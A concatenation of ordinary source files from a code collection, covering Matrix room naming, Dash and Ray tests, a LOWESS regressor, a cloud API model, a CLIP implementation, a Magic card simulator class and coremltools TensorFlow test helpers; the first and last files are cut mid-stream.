fallback_to_members: bool = True,
fallback_to_single_member: bool = True,
) -> Optional[str]:
"""
Works out a user-facing name for the given room as per Matrix
spec recommendations.
Does not yet support internationalisation.
Args:
store: The data store to query.
room_state_ids: Dictionary of the room's state IDs.
user_id: The ID of the user to whom the room name is being presented
fallback_to_members: If False, return None instead of generating a name
based on the room's members if the room has no
title or aliases.
fallback_to_single_member: If False, return None instead of generating a
name based on the user who invited this user to the room if the room
has no title or aliases.
Returns:
A human readable name for the room, if possible.
"""
# does it have a name?
if (EventTypes.Name, "") in room_state_ids:
m_room_name = await store.get_event(
room_state_ids[(EventTypes.Name, "")], allow_none=True
)
if m_room_name and m_room_name.content and m_room_name.content.get("name"):
return m_room_name.content["name"]
# does it have a canonical alias?
if (EventTypes.CanonicalAlias, "") in room_state_ids:
canon_alias = await store.get_event(
room_state_ids[(EventTypes.CanonicalAlias, "")], allow_none=True
)
if (
canon_alias
and canon_alias.content
and canon_alias.content.get("alias")
and _looks_like_an_alias(canon_alias.content["alias"])
):
return canon_alias.content["alias"]
if not fallback_to_members:
return None
my_member_event = None
if (EventTypes.Member, user_id) in room_state_ids:
my_member_event = await store.get_event(
room_state_ids[(EventTypes.Member, user_id)], allow_none=True
)
if (
my_member_event is not None
and my_member_event.content.get("membership") == Membership.INVITE
):
if (EventTypes.Member, my_member_event.sender) in room_state_ids:
inviter_member_event = await store.get_event(
room_state_ids[(EventTypes.Member, my_member_event.sender)],
allow_none=True,
)
if inviter_member_event:
if fallback_to_single_member:
return "Invite from %s" % (
name_from_member_event(inviter_member_event),
)
else:
return None
else:
return "Room Invite"
# at this point we're going to need to search the state by all state keys
# for an event type, so rearrange the data structure
room_state_bytype_ids = _state_as_two_level_dict(room_state_ids)
# we're going to have to generate a name based on who's in the room,
# so find out who is in the room that isn't the user.
if EventTypes.Member in room_state_bytype_ids:
member_events = await store.get_events(
list(room_state_bytype_ids[EventTypes.Member].values())
)
all_members = [
ev
for ev in member_events.values()
if ev.content.get("membership") == Membership.JOIN
or ev.content.get("membership") == Membership.INVITE
]
# Sort the member events oldest-first so the we name people in the
# order the joined (it should at least be deterministic rather than
# dictionary iteration order)
all_members.sort(key=lambda e: e.origin_server_ts)
other_members = [m for m in all_members if m.state_key != user_id]
else:
other_members = []
all_members = []
if len(other_members) == 0:
if len(all_members) == 1:
# self-chat, peeked room with 1 participant,
# or inbound invite, or outbound 3PID invite.
if all_members[0].sender == user_id:
if EventTypes.ThirdPartyInvite in room_state_bytype_ids:
third_party_invites = room_state_bytype_ids[
EventTypes.ThirdPartyInvite
].values()
if len(third_party_invites) > 0:
# technically third party invite events are not member
# events, but they are close enough
# FIXME: no they're not - they look nothing like a member;
# they have a great big encrypted thing as their name to
# prevent leaking the 3PID name...
# return "Inviting %s" % (
# descriptor_from_member_events(third_party_invites)
# )
return "Inviting email address"
else:
return ALL_ALONE
else:
return name_from_member_event(all_members[0])
else:
return ALL_ALONE
elif len(other_members) == 1 and not fallback_to_single_member:
return None
return descriptor_from_member_events(other_members)
def descriptor_from_member_events(member_events: Iterable[EventBase]) -> str:
"""Get a description of the room based on the member events.
Args:
member_events: The events of a room.
Returns:
The room description
"""
member_events = list(member_events)
if len(member_events) == 0:
return "nobody"
elif len(member_events) == 1:
return name_from_member_event(member_events[0])
elif len(member_events) == 2:
return "%s and %s" % (
name_from_member_event(member_events[0]),
name_from_member_event(member_events[1]),
)
else:
return "%s and %d others" % (
name_from_member_event(member_events[0]),
len(member_events) - 1,
)
def name_from_member_event(member_event: EventBase) -> str:
if member_event.content and member_event.content.get("displayname"):
return member_event.content["displayname"]
return member_event.state_key
def _state_as_two_level_dict(state: StateMap[str]) -> Dict[str, Dict[str, str]]:
ret = {} # type: Dict[str, Dict[str, str]]
for k, v in state.items():
ret.setdefault(k[0], {})[k[1]] = v
return ret
def _looks_like_an_alias(string: str) -> bool:
return ALIAS_RE.match(string) is not None
|
the-stack_106_15816
|
"""
Testing of callbacks in non-Python Alert snippets.
"""
from pathlib import Path
import dash.testing.wait as wait
from .helpers import load_jl_app, load_r_app
HERE = Path(__file__).parent
def test_r_dismiss(dashr):
r_app = load_r_app((HERE.parent / "alert" / "dismiss.R"), "alert")
dashr.start_server(r_app)
check_dismiss_callbacks(dashr)
def test_jl_dismiss(dashjl):
jl_app = load_jl_app((HERE.parent / "alert" / "dismiss.jl"), "alert")
dashjl.start_server(jl_app)
check_dismiss_callbacks(dashjl)
def check_dismiss_callbacks(runner):
assert runner.find_element("#alert-fade") != []
runner.find_element("#alert-toggle-fade").click()
wait.until(
lambda: runner.find_elements("#alert-fade") == [],
timeout=4,
)
assert runner.find_element("#alert-no-fade") != []
runner.find_element("#alert-toggle-no-fade").click()
wait.until(
lambda: runner.find_elements("#alert-no-fade") == [],
timeout=4,
)
|
the-stack_106_15818
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import pytest
import ray
import ray.services as services
from ray.test.cluster_utils import Cluster
logger = logging.getLogger(__name__)
@pytest.fixture
def start_connected_cluster():
# Start the Ray processes.
g = Cluster(
initialize_head=True,
connect=True,
head_node_args={
"resources": dict(CPU=1),
"_internal_config": json.dumps({
"num_heartbeats_timeout": 10
})
})
yield g
# The code after the yield will run as teardown code.
ray.shutdown()
g.shutdown()
@pytest.fixture
def start_connected_longer_cluster():
"""Creates a cluster with a longer timeout."""
g = Cluster(
initialize_head=True,
connect=True,
head_node_args={
"resources": dict(CPU=1),
"_internal_config": json.dumps({
"num_heartbeats_timeout": 20
})
})
yield g
# The code after the yield will run as teardown code.
ray.shutdown()
g.shutdown()
def test_cluster():
"""Basic test for adding and removing nodes in cluster."""
g = Cluster(initialize_head=False)
node = g.add_node()
node2 = g.add_node()
assert node.all_processes_alive()
assert node2.all_processes_alive()
g.remove_node(node2)
g.remove_node(node)
assert not any(n.any_processes_alive() for n in [node, node2])
def test_shutdown():
g = Cluster(initialize_head=False)
node = g.add_node()
node2 = g.add_node()
g.shutdown()
assert not any(n.any_processes_alive() for n in [node, node2])
def test_internal_config(start_connected_longer_cluster):
"""Checks that the internal configuration setting works.
We set the cluster to timeout nodes after 2 seconds of no timeouts. We
then remove a node, wait for 1 second to check that the cluster is out
of sync, then wait another 2 seconds (giving 1 second of leeway) to check
that the client has timed out.
"""
cluster = start_connected_longer_cluster
worker = cluster.add_node()
cluster.wait_for_nodes()
cluster.remove_node(worker)
cluster.wait_for_nodes(retries=10)
assert ray.global_state.cluster_resources()["CPU"] == 2
cluster.wait_for_nodes(retries=20)
assert ray.global_state.cluster_resources()["CPU"] == 1
def test_wait_for_nodes(start_connected_cluster):
"""Unit test for `Cluster.wait_for_nodes`.
Adds 4 workers, waits, then removes 4 workers, waits,
then adds 1 worker, waits, and removes 1 worker, waits.
"""
cluster = start_connected_cluster
workers = [cluster.add_node() for i in range(4)]
cluster.wait_for_nodes()
[cluster.remove_node(w) for w in workers]
cluster.wait_for_nodes()
assert ray.global_state.cluster_resources()["CPU"] == 1
worker2 = cluster.add_node()
cluster.wait_for_nodes()
cluster.remove_node(worker2)
cluster.wait_for_nodes()
assert ray.global_state.cluster_resources()["CPU"] == 1
def test_worker_plasma_store_failure(start_connected_cluster):
cluster = start_connected_cluster
worker = cluster.add_node()
cluster.wait_for_nodes()
# Log monitor doesn't die for some reason
worker.kill_log_monitor()
worker.kill_plasma_store()
worker.process_dict[services.PROCESS_TYPE_RAYLET][0].wait()
assert not worker.any_processes_alive(), worker.live_processes()
|
the-stack_106_15819
|
import numpy as np
class LOWESS:
def __init__(self, sigma=1., frac=1., eps=1e-8):
self.sigma = sigma
self.frac = frac
self.eps = eps
self.X_ = None
self.y_ = None
def _compute_weights(self, x):
distances = np.linalg.norm(self.X_ - x[:, None], axis=-1)
# gaussian kernel where sigma define the brandwidth
weights = np.exp(-(distances ** 2) / self.sigma)
# take weights of the closest points only
weights = weights * (distances <= np.quantile(distances, q=self.frac))
# clip weights close to zero
weights = np.where(np.abs(weights) >= self.eps, weights, 0.)
return weights
def fit(self, X, y):
self.X_ = X
self.y_ = y
def predict(self, X):
n_samples = X.shape[0]
y_hat = np.zeros(n_samples)
for i in range(n_samples):
y_hat[i] = np.average(
self.y_,
weights=self._compute_weights(X[i, :]),
)
return y_hat
|
the-stack_106_15820
|
# coding: utf-8
"""
CLOUD API
An enterprise-grade Infrastructure is provided as a Service (IaaS) solution that can be managed through a browser-based \"Data Center Designer\" (DCD) tool or via an easy to use API. The API allows you to perform a variety of management tasks such as spinning up additional servers, adding volumes, adjusting networking, and so forth. It is designed to allow users to leverage the same power and flexibility found within the DCD visual tool. Both tools are consistent with their concepts and lend well to making the experience smooth and intuitive. # noqa: E501
The version of the OpenAPI document: 5.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from ionoscloud.configuration import Configuration
class S3ObjectStorageSSO(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'sso_url': 'str',
}
attribute_map = {
'sso_url': 'ssoUrl',
}
def __init__(self, sso_url=None, local_vars_configuration=None): # noqa: E501
"""S3ObjectStorageSSO - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._sso_url = None
self.discriminator = None
if sso_url is not None:
self.sso_url = sso_url
@property
def sso_url(self):
"""Gets the sso_url of this S3ObjectStorageSSO. # noqa: E501
The S3 object storage single sign on url # noqa: E501
:return: The sso_url of this S3ObjectStorageSSO. # noqa: E501
:rtype: str
"""
return self._sso_url
@sso_url.setter
def sso_url(self, sso_url):
"""Sets the sso_url of this S3ObjectStorageSSO.
The S3 object storage single sign on url # noqa: E501
:param sso_url: The sso_url of this S3ObjectStorageSSO. # noqa: E501
:type sso_url: str
"""
self._sso_url = sso_url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, S3ObjectStorageSSO):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, S3ObjectStorageSSO):
return True
return self.to_dict() != other.to_dict()
|
the-stack_106_15821
|
import math
import copy
from contextlib import contextmanager
from functools import partial
import torch
import torch.nn.functional as F
from torch import nn, einsum
from einops import rearrange, repeat, reduce
from einops.layers.torch import Rearrange
from x_clip.mlm import MLM
from x_clip.visual_ssl import SimSiam, SimCLR
# helper functions
def exists(val):
return val is not None
def default(val, d):
return val if exists(val) else d
@contextmanager
def null_context():
yield
def max_neg_value(dtype):
return -torch.finfo(dtype).max
def masked_mean(t, mask, dim = 1, eps = 1e-6):
t = t.masked_fill(~mask, 0.)
numer = t.sum(dim = dim)
denom = mask.sum(dim = dim).clamp(min = eps)
return numer / denom
def log(t, eps = 1e-20):
return torch.log(t + eps)
def l2norm(t):
return F.normalize(t, dim = -1, p = 2)
# helper classes
class RearrangeImage(nn.Module):
def forward(self, x):
return rearrange(x, 'b (h w) c -> b c h w', h = int(math.sqrt(x.shape[1])))
class PreNorm(nn.Module):
def __init__(self, dim, fn):
super().__init__()
self.norm = nn.LayerNorm(dim)
self.fn = fn
def forward(self, x, **kwargs):
return self.fn(self.norm(x), **kwargs)
# transformer
class FeedForward(nn.Module):
def __init__(self, dim, mult = 4, dropout = 0.):
super().__init__()
inner_dim = int(dim * mult)
self.net = nn.Sequential(
nn.Linear(dim, inner_dim),
nn.GELU(),
nn.Dropout(dropout),
nn.Linear(inner_dim, dim)
)
def forward(self, x):
return self.net(x)
class Attention(nn.Module):
def __init__(self, dim, dim_head = 64, heads = 8, dropout = 0.):
super().__init__()
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = dim_head * heads
self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False)
self.to_out = nn.Linear(inner_dim, dim)
self.dropout = nn.Dropout(dropout)
def forward(self, x, mask = None):
h = self.heads
q, k, v = self.to_qkv(x).chunk(3, dim = -1)
q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), (q, k, v))
sim = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale
if exists(mask):
mask = rearrange(mask, 'b j -> b 1 1 j')
mask_value = -torch.finfo(sim.dtype).max
sim = sim.masked_fill(~mask, mask_value)
attn = sim.softmax(dim = -1)
attn = self.dropout(attn)
out = einsum('b h i j, b h j d -> b h i d', attn, v)
out = rearrange(out, 'b h n d -> b n (h d)')
return self.to_out(out)
class Transformer(nn.Module):
def __init__(
self,
dim,
*,
depth,
dim_head = 64,
heads = 8,
attn_dropout = 0.,
ff_dropout = 0.,
ff_mult = 4
):
super().__init__()
self.layers = nn.ModuleList([])
for _ in range(depth):
self.layers.append(nn.ModuleList([
PreNorm(dim, Attention(dim = dim, dim_head = dim_head, heads = heads, dropout = attn_dropout)),
PreNorm(dim, FeedForward(dim = dim, mult = ff_mult)),
]))
self.norm_out = nn.LayerNorm(dim)
def forward(self, x, mask = None):
for attn, ff in self.layers:
x = attn(x, mask = mask) + x
x = ff(x) + x
return self.norm_out(x)
# text and vision transformers
class TextTransformer(nn.Module):
def __init__(
self,
dim,
*,
num_tokens,
max_seq_len,
**kwargs
):
super().__init__()
self.token_emb = nn.Embedding(num_tokens, dim)
self.pos_emb = nn.Embedding(max_seq_len, dim)
self.cls_token = nn.Parameter(torch.randn(dim))
self.transformer = Transformer(dim, **kwargs)
def forward(self, x, mask = None):
b, n, device = *x.shape, x.device
x = self.token_emb(x)
pos_emb = self.pos_emb(torch.arange(n, device = device))
x = x + rearrange(pos_emb, 'n d -> 1 n d')
cls_tokens = repeat(self.cls_token, 'd -> b 1 d', b = b)
x = torch.cat((cls_tokens, x), dim = 1)
if exists(mask):
mask = F.pad(mask, (1, 0), value = True)
out = self.transformer(x, mask = mask)
return out
class VisionTransformer(nn.Module):
def __init__(
self,
dim,
*,
image_size,
patch_size,
channels,
**kwargs
):
super().__init__()
assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.'
num_patches = (image_size // patch_size) ** 2
patch_dim = channels * patch_size ** 2
self.cls_token = nn.Parameter(torch.randn(dim))
self.to_tokens = nn.Sequential(
Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size),
nn.Linear(patch_dim, dim)
)
self.pos_emb = nn.Embedding(num_patches, dim)
self.transformer = Transformer(dim, **kwargs)
def forward(self, x):
device = x.device
x = self.to_tokens(x)
b, n, _ = x.shape
pos_emb = self.pos_emb(torch.arange(n, device = device))
x = x + rearrange(pos_emb, 'n d -> 1 n d')
cls_tokens = repeat(self.cls_token, 'd -> b 1 d', b = b)
x = torch.cat((cls_tokens, x), dim = 1)
out = self.transformer(x)
return out
# main clip class
class CLIP(nn.Module):
def __init__(
self,
*,
image_encoder = None,
text_encoder = None,
dim_text = 512,
dim_image = 512,
dim_latent = 512,
num_text_tokens = 10000,
text_enc_depth = 6,
text_seq_len = 256,
text_heads = 8,
text_has_cls_token = True,
visual_enc_depth = 6,
visual_heads = 8,
visual_image_size = 256,
visual_patch_size = 32,
visual_has_cls_token = True,
channels = 3,
use_all_token_embeds = False,
downsample_image_embeds = False,
decoupled_contrastive_learning = False,
extra_latent_projection = False,
use_mlm = False,
text_ssl_loss_weight = 0.05,
use_visual_ssl = False,
visual_ssl_type = 'simsiam',
visual_ssl_hidden_layer = -1,
simclr_temperature = 0.1,
image_ssl_loss_weight = 0.05
):
super().__init__()
assert use_all_token_embeds or (visual_has_cls_token or text_has_cls_token), 'CLS token must be included on both vision and text transformers if you are not using fine-grained contrastive learning loss'
# instantiate text transformer
self.text_has_cls_token = text_has_cls_token
if exists(text_encoder):
self.text_transformer = text_encoder
else:
self.text_transformer = TextTransformer(
dim = dim_text,
num_tokens = num_text_tokens + (1 if use_mlm else 0),
max_seq_len = text_seq_len,
depth = text_enc_depth,
heads = text_heads
)
# instantiate image transformer
self.visual_has_cls_token = visual_has_cls_token
if exists(image_encoder):
self.visual_transformer = image_encoder
else:
self.visual_transformer = VisionTransformer(
dim = dim_image,
image_size = visual_image_size,
patch_size = visual_patch_size,
channels = channels,
depth = visual_enc_depth,
heads = visual_heads
)
# text ssl
self.use_mlm = use_mlm
self.text_ssl_loss_weight = text_ssl_loss_weight
if use_mlm:
self.mlm = MLM(
self.text_transformer,
dim = dim_text,
num_tokens = num_text_tokens
)
# image ssl
self.use_visual_ssl = use_visual_ssl
self.image_ssl_loss_weight = image_ssl_loss_weight
if use_visual_ssl:
if visual_ssl_type == 'simsiam':
ssl_type = SimSiam
elif visual_ssl_type == 'simclr':
ssl_type = partial(SimCLR, temperature = simclr_temperature)
else:
raise ValueError(f'unknown visual_ssl_type')
self.visual_ssl = ssl_type(
self.visual_transformer,
image_size = visual_image_size,
hidden_layer = visual_ssl_hidden_layer
)
# text latent projection
self.to_text_latent = nn.Linear(dim_text, dim_latent, bias = False)
# image latent projection
if downsample_image_embeds:
assert use_all_token_embeds, 'must be using all token embeds for contrastive learning in order to downsampling'
self.to_visual_latent = nn.Sequential(
RearrangeImage(),
nn.Conv2d(dim_image, dim_image, 4, stride = 2, padding = 1, bias = False, groups = dim_image),
nn.Conv2d(dim_image, dim_latent, 1),
Rearrange('b c h w -> b (h w) c')
)
else:
self.to_visual_latent = nn.Linear(dim_image, dim_latent, bias = False)
# temperature
self.temperature = nn.Parameter(torch.tensor(1.))
# from https://arxiv.org/abs/2111.07783 (FILIP paper)
self.use_all_token_embeds = use_all_token_embeds
# proposed in https://arxiv.org/abs/2110.06848 (DCL) and https://arxiv.org/abs/2110.11316 (CLOOB)
self.decoupled_contrastive_learning = decoupled_contrastive_learning
# proposed in https://arxiv.org/abs/2110.11316 (CLOOB)
self.extra_latent_projection = extra_latent_projection
self.to_text_latent_extra = copy.deepcopy(self.to_text_latent)
self.to_visual_latent_extra = copy.deepcopy(self.to_visual_latent)
def forward(
self,
text,
image,
text_mask = None,
return_loss = False,
freeze_image_encoder = False, # image encoder is not trained if this is set to True, proposed by LiT paper
freeze_text_encoder = False, # text encoder is not trained if this is set to True
text_to_image = True # in the case the extra projection is turned on, would return different similarity values depending on modality directionality
):
b, device = text.shape[0], text.device
# ssl
text_ssl_loss = 0
image_ssl_loss = 0
if return_loss:
text_ssl_loss = self.mlm(text, mask = text_mask) if self.use_mlm else 0
image_ssl_loss = self.visual_ssl(image) if self.use_visual_ssl else 0
# get encoded text
text_encoding_context = null_context if not freeze_text_encoder else torch.no_grad
with text_encoding_context():
enc_text = self.text_transformer(text, mask = text_mask)
if freeze_text_encoder:
enc_text.detach_()
# whether to train image encoder, in the case that the image net was pretrained as recommended in LiT
image_encoding_context = null_context if not freeze_image_encoder else torch.no_grad
with image_encoding_context():
enc_image = self.visual_transformer(image)
if freeze_image_encoder:
enc_image.detach_()
# depending on whether to do fine-grained CLIP or not, select either all tokens, or CLS tokens only
if self.use_all_token_embeds:
text_embeds = enc_text[:, 1:] if self.text_has_cls_token else enc_text
image_embeds = enc_image[:, 1:] if self.visual_has_cls_token else enc_image
else:
text_embeds = enc_text[:, 0]
image_embeds = enc_image[:, 0]
# project to latents
text_latents = self.to_text_latent(text_embeds)
image_latents = self.to_visual_latent(image_embeds)
text_latents, image_latents = map(l2norm, (text_latents, image_latents))
# calculate another set of latents for image to text (vs text to image)
# proposed by CLOOB
text_latents_extra, image_latents_extra = text_latents, image_latents
if self.extra_latent_projection:
text_latents_extra = self.to_text_latent_extra(text_embeds)
image_latents_extra = self.to_visual_latent_extra(image_embeds)
text_latents_extra, image_latents_extra = map(l2norm, (text_latents_extra, image_latents_extra))
# get temperature
temp = self.temperature.exp()
# early return, if needed
if not return_loss and self.use_all_token_embeds:
einsum_args = (text_latents_extra, image_latents_extra) if self.extra_latent_projection and not text_to_image else (text_latents, image_latents)
return einsum('b t d, b i d -> b t i', *einsum_args) * temp
if not return_loss and not self.use_all_token_embeds:
einsum_args = (text_latents_extra, image_latents_extra) if self.extra_latent_projection and not text_to_image else (text_latents, image_latents)
return einsum('b d, b d -> b', *einsum_args) * temp
# contrastive loss
if self.use_all_token_embeds:
# fine-grained CLIP logic
sim_text_to_image = einsum('x t d, y i d -> x y t i', text_latents, image_latents) * temp
sim_image_to_text = sim_text_to_image
if self.extra_latent_projection:
sim_image_to_text = einsum('x t d, y i d -> x y t i', text_latents_extra, image_latents_extra) * temp
if exists(text_mask):
text_to_image = reduce(sim_text_to_image, 'bt bi t i -> bt bi t', 'max')
text_to_image_mask = rearrange(text_mask, 'bt t -> bt 1 t')
text_to_image = masked_mean(text_to_image, text_to_image_mask, dim = -1)
image_to_text_mask = rearrange(text_mask, 'bt t -> bt 1 t 1')
masked_sim = sim_image_to_text.masked_fill(~image_to_text_mask, max_neg_value(sim_image_to_text.dtype))
image_to_text = reduce(reduce(masked_sim, 'bt bi t i -> bt bi i', 'max'), 'bt bi i -> bi bt', 'mean')
else:
text_to_image = reduce(reduce(sim_text_to_image, 'bt bi t i -> bt bi t', 'max'), 'bt bi t -> bt bi', 'mean')
image_to_text = reduce(reduce(sim_image_to_text, 'bt bi t i -> bt bi i', 'max'), 'bt bi i -> bi bt', 'mean')
else:
text_to_image = einsum('t d, i d -> t i', text_latents, image_latents) * temp
image_to_text = text_to_image.t()
if self.extra_latent_projection:
image_to_text = einsum('t d, i d -> i t', text_latents_extra, image_latents_extra) * temp
# calculate loss
# exponentiate
text_to_image_exp, image_to_text_exp = map(torch.exp, (text_to_image, image_to_text))
# numerators
text_to_image_pos, image_to_text_pos = map(torch.diag, (text_to_image_exp, image_to_text_exp))
# denominator
if self.decoupled_contrastive_learning:
pos_mask = torch.eye(b, device = device, dtype = torch.bool)
text_to_image_exp, image_to_text_exp = map(lambda t: t.masked_fill(pos_mask, 0.), (text_to_image_exp, image_to_text_exp))
text_to_image_denom, image_to_text_denom = map(lambda t: t.sum(dim = -1), (text_to_image_exp, image_to_text_exp))
# loss
text_to_image_loss = -log(text_to_image_pos / text_to_image_denom).mean()
image_to_text_loss = -log(image_to_text_pos / image_to_text_denom).mean()
cl_loss = (text_to_image_loss + image_to_text_loss) / 2
# calculate weights
cl_loss_weight = 1 - (self.text_ssl_loss_weight + self.image_ssl_loss_weight)
loss = (cl_loss * cl_loss_weight) \
+ (text_ssl_loss * self.text_ssl_loss_weight) \
+ (image_ssl_loss * self.image_ssl_loss_weight)
return loss
|
the-stack_106_15823
|
"""
Defines the Card class which models a Magic: the Gathering card's behaviour.
Currently, the following actions are supported: to gain mana instanteneously as
well as according to a pattern every turn, to create gold/create gold/draw Cards
immediately as well as according to a pattern every turn. Additionally, a card
has a mana cost and can be a land or nonland. Finally, it may cause the removal of
a number of lands from the remaining deck.
"""
from typing import Optional, TYPE_CHECKING
from mtg_mana_simulator.sequence import Sequence
if TYPE_CHECKING:
from mtg_mana_simulator.context import Context
class Card:
"""Simplified model of a Magic card"""
untapped_land : "Card"
tapped_land : "Card"
cantrip : "Card"
filler : "Card"
def __init__(self, name: str = "", *,
land: bool = False,
cost: Optional[int] = 0,
mana_sequence: Optional[Sequence] = None,
draw_sequence: Optional[Sequence] = None,
gold_sequence: Optional[Sequence] = None,
land_sequence: Optional[Sequence] = None,
lands_removed: int = 0) -> None:
self.name = name
self.land = land
self.cost = cost
self.mana_sequence: Sequence = mana_sequence if mana_sequence is not None else Sequence.zero
self.draw_sequence: Sequence = draw_sequence if draw_sequence is not None else Sequence.zero
self.gold_sequence: Sequence = gold_sequence if gold_sequence is not None else Sequence.zero
self.land_sequence: Sequence = land_sequence if land_sequence is not None else Sequence.zero
self.lands_removed = lands_removed
def approximate_net_mana_sequence(self) -> Sequence:
""" (assuming gold is spent immediately)"""
return self.mana_sequence + self.gold_sequence + Sequence.once(-(self.cost or 0))
def netgain(self) -> int:
"""The immediate return in mana upon playing this card"""
return self.mana_sequence[0] + self.gold_sequence[0] - (self.cost or 0)
def is_ramp(self) -> bool:
"""Whether this card produces mana at some point"""
return self.mana_sequence != Sequence.zero or self.gold_sequence != Sequence.zero
def is_draw(self) -> bool:
"""Whether this card draws cards at some point"""
return self.draw_sequence != Sequence.zero
def is_playable(self, context: "Context") -> bool:
"""Whether this card is playable given a context"""
return (self.cost is not None and self.cost <= context.mana + context.gold) or\
(self.land and context.land > 0)
@staticmethod
def untapped_rock(cost: int, mana: int) -> "Card":
"""Card with given cost and given mana gain"""
return Card(cost=cost, mana_sequence=Sequence.repeat(mana))
@staticmethod
def tapped_rock(cost: int, mana: int) -> "Card":
"""Card with given cost and given mana gain starting next turn"""
return Card(cost=cost, mana_sequence=Sequence.repeat(mana).prefixed_by([0]))
@staticmethod
def draw_spell(cost: int, cards: int) -> "Card":
"""Card with given cost that immediately draws given amount of cards"""
return Card(cost=cost, draw_sequence=Sequence.once(cards))
Card.untapped_land = Card("Untapped land", cost=None, land=True, mana_sequence=Sequence.one)
Card.tapped_land = Card("Tapped land", cost=None, land=True,
mana_sequence=Sequence.one.prefixed_by([0]))
Card.cantrip = Card.draw_spell(1, 1)
Card.filler = Card("Filler", cost=20000)
|
the-stack_106_15828
|
# Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import six
from coremltools import TensorType
import pytest
tf = pytest.importorskip("tensorflow", minversion="1.14.0")
from coremltools.converters.mil.testing_utils import compare_shapes, compare_backend
from coremltools.converters.mil.testing_reqs import converter
from tensorflow.python.framework import dtypes
import tempfile
import os
from tensorflow.python.tools.freeze_graph import freeze_graph as freeze_g
frontend = "tensorflow"
def make_tf_graph(input_types):
"""
Decorator to help construct TensorFlow 1.x model.
Parameters
----------
input_types: list of tuple
List of input types. E.g. [(3, 224, 224, tf.int32)] represent 1 input,
with shape (3, 224, 224), and the expected data type is tf.int32. The
dtype is optional, in case it's missing, tf.float32 will be used.
Returns
-------
tf.Graph, list of str, list of str
"""
def wrapper(ops):
with tf.Graph().as_default() as model:
inputs = []
for input_type in input_types:
input_type = tuple(input_type)
if len(input_type) > 0 and isinstance(input_type[-1], dtypes.DType):
shape, dtype = input_type[:-1], input_type[-1]
else:
shape, dtype = input_type, tf.float32
inputs.append(tf.placeholder(shape=shape, dtype=dtype))
outputs = ops(*inputs)
return model, inputs, outputs
return wrapper
def get_tf_keras_io_names(model):
"""
Utility function to get tf.keras inputs/outputs names from a tf.keras model.
Parameter
---------
model: tf.keras.Model
"""
input_names, output_names = [], []
for i in model.inputs:
input_names.append(i.name.split(":")[0])
for o in model.outputs:
output_names.append(o.name.split(":")[0].split("/")[-1])
return input_names, output_names
def get_tf_node_names(tf_nodes, mode="inputs"):
"""
Inputs:
- tf_nodes: list[str]. Names of target placeholders or output variable.
- mode: str. When mode == inputs, do the stripe for the input names, for
instance 'placeholder:0' could become 'placeholder'.
when model == 'outputs', we keep the origin suffix number, like
'bn:0' will still be 'bn:0'.
Return a list of names from given list of TensorFlow nodes. Tensor name's
postfix is eliminated if there's no ambiguity. Otherwise, postfix is kept
"""
if not isinstance(tf_nodes, list):
tf_nodes = [tf_nodes]
names = list()
for n in tf_nodes:
tensor_name = n if isinstance(n, six.string_types) else n.name
if mode == "outputs":
names.append(tensor_name)
continue
name = tensor_name.split(":")[0]
if name in names:
# keep postfix notation for multiple inputs/outputs
names[names.index(name)] = name + ":" + str(names.count(name) - 1)
names.append(tensor_name)
else:
names.append(name)
return names
def tf_graph_to_proto(
graph, feed_dict, output_nodes, frontend="tensorflow", backend="nn_proto"
):
"""
Parameters
----------
graph: tf.Graph
TensorFlow 1.x model in tf.Graph format.
feed_dict: dict of (tf.placeholder, np.array)
Dict of placeholder and value pairs representing inputs.
output_nodes: tf.node or list[tf.node]
List of names representing outputs.
frontend: str
Frontend to convert from.
backend: str
Backend to convert to.
-----------
Returns Proto, Input Values, Output Names
"""
if isinstance(output_nodes, tuple):
output_nodes = list(output_nodes)
if not isinstance(output_nodes, list):
output_nodes = [output_nodes]
# Convert TF graph.
input_names = get_tf_node_names(list(feed_dict.keys()), mode="inputs")
output_names = get_tf_node_names(output_nodes, mode="outputs")
input_values = {name: val for name, val in zip(input_names, feed_dict.values())}
inputs = [TensorType(name=input_name) for input_name in input_names]
mlmodel = converter.convert(
graph, inputs=inputs, outputs=output_names, source=frontend, convert_to=backend
)
proto = mlmodel.get_spec()
return proto, input_values, output_names, output_nodes
def load_tf_pb(pb_file):
"""
Loads a pb file to tf.Graph
"""
# We load the protobuf file from the disk and parse it to retrieve the
# unsterilized graph_def
with tf.io.gfile.GFile(pb_file, "rb") as f:
graph_def = tf.compat.v1.GraphDef()
graph_def.ParseFromString(f.read())
# Then, we import the graph_def into a new Graph and returns it
with tf.Graph().as_default() as graph:
# The name var will prefix every op/nodes in your graph
# Since we load everything in a new graph, this is not needed
tf.import_graph_def(graph_def, name="")
return graph
def run_compare_tf(
graph,
feed_dict,
output_nodes,
use_cpu_only=False,
frontend_only=False,
frontend="tensorflow",
backend="nn_proto",
atol=1e-04,
rtol=1e-05,
validate_shapes_only=False,
